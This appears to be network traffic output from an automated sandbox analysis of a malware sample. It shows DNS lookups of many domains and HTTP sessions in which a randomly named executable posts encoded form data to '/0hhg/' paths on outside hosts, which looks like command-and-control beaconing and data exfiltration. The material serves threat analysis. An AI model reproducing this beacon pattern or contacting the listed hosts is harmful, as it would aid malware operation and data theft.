                                                                                                    May 2, 2024 08:26:22.263286114 CEST4975880192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:23.632869959 CEST4975980192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:24.022639990 CEST8049759119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:24.022773981 CEST4975980192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:24.024579048 CEST4975980192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:24.417021990 CEST8049759119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:24.428209066 CEST8049759119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:24.428514957 CEST8049759119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:24.428622007 CEST4975980192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:25.529511929 CEST4975980192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:26.548207998 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:26.941250086 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:26.942837000 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:27.604631901 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:27.997792006 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.997816086 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.997827053 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.997880936 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.997946978 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.998092890 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:27.998162985 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:28.011447906 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:28.011591911 CEST8049760119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:28.011660099 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:29.234507084 CEST4976080192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:30.251503944 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:30.646806002 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:30.647015095 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:30.653178930 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:31.046636105 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:31.056354046 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:31.056926012 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:31.060983896 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:31.063513041 CEST4976180192.168.2.4119.18.54.116
                                                                                                    May 2, 2024 08:26:31.457293987 CEST8049761119.18.54.116192.168.2.4
                                                                                                    May 2, 2024 08:26:36.642299891 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:36.830440998 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:36.835719109 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:36.839521885 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.026818037 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571536064 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571630955 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571737051 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571753025 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.571783066 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.571850061 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.572010994 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572062016 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572170973 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572217941 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.572230101 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572256088 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572276115 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.572303057 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.572364092 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.759387970 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759470940 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759517908 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759531975 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759553909 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.759624958 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.759776115 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759788036 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759800911 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759815931 CEST8049762188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:37.759870052 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:37.759870052 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:38.342035055 CEST4976280192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:39.361160994 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:39.546626091 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:39.547630072 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:39.551518917 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:39.736576080 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.109965086 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.109991074 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110007048 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110022068 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110030890 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.110034943 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110047102 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110053062 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.110059977 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110070944 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110078096 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.110083103 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110100031 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.110137939 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.110172033 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.295114040 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295135021 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295146942 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295164108 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295176029 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295239925 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.295243025 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295267105 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295284033 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.295286894 CEST8049763188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:40.295306921 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:40.295325994 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:41.063610077 CEST4976380192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.082297087 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.271070957 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.271166086 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.273371935 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.461424112 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.461792946 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.461944103 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.462227106 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.462385893 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849715948 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849807978 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849819899 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849832058 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849843025 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849905968 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.849905968 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.849987030 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.849997997 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.850058079 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.850070000 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.850115061 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:42.850142956 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:42.855937958 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.037242889 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037261963 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037322998 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.037342072 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037403107 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037492990 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.037506104 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037578106 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037677050 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.037693977 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.037725925 CEST8049764188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:43.038083076 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:43.779907942 CEST4976480192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:44.798063993 CEST4976580192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:44.984549999 CEST8049765188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:44.987808943 CEST4976580192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:44.991528034 CEST4976580192.168.2.4188.116.38.155
                                                                                                    May 2, 2024 08:26:45.177735090 CEST8049765188.116.38.155192.168.2.4
                                                                                                    May 2, 2024 08:26:45.416357994 CEST8049765188.116.38.155192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 2, 2024 08:24:42.305643082 CEST | 192.168.2.4 | 1.1.1.1 | 0xf080 | Standard query (0) | www.vavada-band.ru | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:00.439603090 CEST | 192.168.2.4 | 1.1.1.1 | 0xcb70 | Standard query (0) | www.bettaroom.ru | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:18.798521042 CEST | 192.168.2.4 | 1.1.1.1 | 0xa6af | Standard query (0) | www.dhleba51.ru | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:33.814400911 CEST | 192.168.2.4 | 1.1.1.1 | 0xfbd3 | Standard query (0) | www.dainikmirpur.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:51.518388987 CEST | 192.168.2.4 | 1.1.1.1 | 0x2cc1 | Standard query (0) | www.whirledairlines.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:05.378520966 CEST | 192.168.2.4 | 1.1.1.1 | 0x31a | Standard query (0) | www.quantummquest.top | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:19.580396891 CEST | 192.168.2.4 | 1.1.1.1 | 0x9a84 | Standard query (0) | www.yamiyasheec.online | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:36.080804110 CEST | 192.168.2.4 | 1.1.1.1 | 0xb152 | Standard query (0) | www.applesolve.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:51.503310919 CEST | 192.168.2.4 | 1.1.1.1 | 0x839a | Standard query (0) | www.xxaiai.top | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:07.446336031 CEST | 192.168.2.4 | 1.1.1.1 | 0x5260 | Standard query (0) | www.vaesen.net | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:15.830028057 CEST | 192.168.2.4 | 1.1.1.1 | 0xe6b5 | Standard query (0) | www.dk48.lol | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:30.429325104 CEST | 192.168.2.4 | 1.1.1.1 | 0x7837 | Standard query (0) | www.cluird.cloud | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:39.048943996 CEST | 192.168.2.4 | 1.1.1.1 | 0xa81d | Standard query (0) | www.cucuzeus88.store | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:57.249764919 CEST | 192.168.2.4 | 1.1.1.1 | 0xee7b | Standard query (0) | www.bnbuotqakx.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 2, 2024 08:24:43.243988991 CEST | 1.1.1.1 | 192.168.2.4 | 0xf080 | No error (0) | www.vavada-band.ru | vavada-band.ru | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:24:43.243988991 CEST | 1.1.1.1 | 192.168.2.4 | 0xf080 | No error (0) | vavada-band.ru | | 148.251.36.121 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:01.043719053 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb70 | No error (0) | www.bettaroom.ru | | 194.58.112.173 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:19.747693062 CEST | 1.1.1.1 | 192.168.2.4 | 0xa6af | No error (0) | www.dhleba51.ru | | 195.24.68.5 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:34.013406992 CEST | 1.1.1.1 | 192.168.2.4 | 0xfbd3 | No error (0) | www.dainikmirpur.com | dainikmirpur.com | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:25:34.013406992 CEST | 1.1.1.1 | 192.168.2.4 | 0xfbd3 | No error (0) | dainikmirpur.com | | 192.250.235.36 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:51.734960079 CEST | 1.1.1.1 | 192.168.2.4 | 0x2cc1 | No error (0) | www.whirledairlines.com | | 216.40.34.41 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:05.568423986 CEST | 1.1.1.1 | 192.168.2.4 | 0x31a | No error (0) | www.quantummquest.top | | 203.161.50.127 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:20.311863899 CEST | 1.1.1.1 | 192.168.2.4 | 0x9a84 | No error (0) | www.yamiyasheec.online | yamiyasheec.online | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:26:20.311863899 CEST | 1.1.1.1 | 192.168.2.4 | 0x9a84 | No error (0) | yamiyasheec.online | | 119.18.54.116 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:36.639506102 CEST | 1.1.1.1 | 192.168.2.4 | 0xb152 | No error (0) | www.applesolve.com | applesolve.com | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:26:36.639506102 CEST | 1.1.1.1 | 192.168.2.4 | 0xb152 | No error (0) | applesolve.com | | 188.116.38.155 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:52.157618999 CEST | 1.1.1.1 | 192.168.2.4 | 0x839a | No error (0) | www.xxaiai.top | | 108.186.8.158 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:07.570497036 CEST | 1.1.1.1 | 192.168.2.4 | 0x5260 | Name error (3) | www.vaesen.net | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:16.118583918 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6b5 | No error (0) | www.dk48.lol | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:27:16.118583918 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6b5 | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:30.992764950 CEST | 1.1.1.1 | 192.168.2.4 | 0x7837 | Name error (3) | www.cluird.cloud | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:39.328984022 CEST | 1.1.1.1 | 192.168.2.4 | 0xa81d | No error (0) | www.cucuzeus88.store | cucuzeus88.store | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:27:39.328984022 CEST | 1.1.1.1 | 192.168.2.4 | 0xa81d | No error (0) | cucuzeus88.store | | 153.92.8.41 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:57.446818113 CEST | 1.1.1.1 | 192.168.2.4 | 0xee7b | No error (0) | www.bnbuotqakx.shop | bnbuotqakx.shop | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:27:57.446818113 CEST | 1.1.1.1 | 192.168.2.4 | 0xee7b | No error (0) | bnbuotqakx.shop | | 101.99.93.157 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 148.251.36.121 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:24:43.587449074 CEST | 438 | OUT | GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= HTTP/1.1
                                                                                                    Host: www.vavada-band.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
May 2, 2024 08:24:43.763344049 CEST | 501 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:24:43 GMT
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 194.58.112.173 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:02.266545057 CEST | 699 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bettaroom.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bettaroom.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.bettaroom.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=72GWO+bOGF52GFX/kj66u3Powmr6P7UIMRKv+2Wef1v8UKEugHWfKzdk0S1o72iuNt7rtN5FjSMxYmfQd0JVzT6SKp96p5N1nGuGsmMjJxtTYslqFmzm7tW/87WEfclQv7Ww4fFkxHpzJLP2QhuyLvTqGnHWfGj2GGHD6hFQIKqTq3/tXVOZjaWHyiXsJDbOlQ==
May 2, 2024 08:25:02.513768911 CEST | 580 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:25:02 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 309
                                                                                                    Connection: close
                                                                                                    Location: http://betta-dom.ru/0hhg/
                                                                                                    Expires: Thu, 02 May 2024 06:30:02 GMT
                                                                                                    Cache-Control: max-age=300
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="http://betta-dom.ru/0hhg/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 194.58.112.173 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:05.004878998 CEST | 719 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bettaroom.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bettaroom.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.bettaroom.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=72GWO+bOGF52GlH/lAC6n3Pn/Gr6VLUMMR2v+3SOfGL8Ur0uhGWfNzdk6y1X1WihNt3jtIZFjSYxYnvQcHhUxD6cf5982pN1nGuGsmIJJwFTY5tqFHzlndW8qrWEV8lUv7WC4epOxEdzJK/2Q0C1EvTzCnG4TTWCOkSy0TpjKbGLiRu3GkvOxay0vleYEAmH+VqPwsb/r6S71qB05giXjzs=
May 2, 2024 08:25:05.224246025 CEST | 580 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:25:05 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 309
                                                                                                    Connection: close
                                                                                                    Location: http://betta-dom.ru/0hhg/
                                                                                                    Expires: Thu, 02 May 2024 06:30:05 GMT
                                                                                                    Cache-Control: max-age=300
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="http://betta-dom.ru/0hhg/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 194.58.112.173 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:09.804352999 CEST | 10801 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bettaroom.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bettaroom.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.bettaroom.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=72GWO+bOGF52GlH/lAC6n3Pn/Gr6VLUMMR2v+3SOfGD8U48ugl+fMzdkyS1s1Wi8NuHdtId7jQgxKR7QJGhU7D6cd595p5MtnG+KsmYJJwFTY4dqM2zl0NW/87W2fckLv7O44ed0yytzJqv2SG61NvTxOHGWTTSdOkPN0XorKYaLnV3gSk34gI+U0na7LizDzyez0unr4OS4/osBly6D+EGT+BchsM2E1pDsRqoBJ6umtzxdo22FmzEXRvdYgUB79d3Sv99iR4x9ML72FMoKmI7LP7rRw9VRRNvbvQrc478MCg29kkW5kPl31SfNTaGb7/A2tKnsZQ2rVYP6iGqyivQnbAgfEXx4Pg2FiFafCi0CMyrX21P9FOP4AsmBx3iBKrOFrOHyBqNchGv8OhyCl/Zmy5nPRi+ZxP1lh5TYGyBh3GyCdh331ke7YmBuxwnqid/a/pFgWmIx5aaHbrGiJYTv2x5fC1EHNL1DD9e8hxg9Ayr+N7kRDkKEZG+didxE0Rnl2GZrOtHXKyRUQoKcO59v1mk/gEgwrD5HUUsK6SGCEiYsOEBTVaFQmTHUlNb2oYRkBXMlZXu7BNl+zKQ9kU3xpLMTbjkiQqM05zEBIDIYN11xAiqGOKyLJxHDUErWvPlsNOTIHuPhcF7uZ1Kahi077Yo1/tCh8vgfSVh9OdApez9lIClLZO3Uc508NmW3gArfIR04Ax6n5z0BIPGWpIN+5waooElG/hHRa1bHCnvIN+A1oSVbkiYL3gROXKVw2pQYmQc7JI82hmYZXCfSQE/PVb2dopohrSg3db8s/ScSMZpLfePWW/OXZsELj1gd/4tV6iMtJk9Bi+3QsCytnpkFFFQDIEATFszo0fRoP/AXu6mMKC0BkmRDNyWjgIeMlPymDYhB6sW/KPEBV09uWJGNg0Cw919iG8ZGo3B2ZyfzixbuZpo+Z4Az7YJ9WddYZ1MhLL1aK4yEzAzkQe5gw+M8vohLYtHvTSASwS89SSu [TRUNCATED]
May 2, 2024 08:25:10.032634020 CEST | 580 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:25:09 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 309
                                                                                                    Connection: close
                                                                                                    Location: http://betta-dom.ru/0hhg/
                                                                                                    Expires: Thu, 02 May 2024 06:30:09 GMT
                                                                                                    Cache-Control: max-age=300
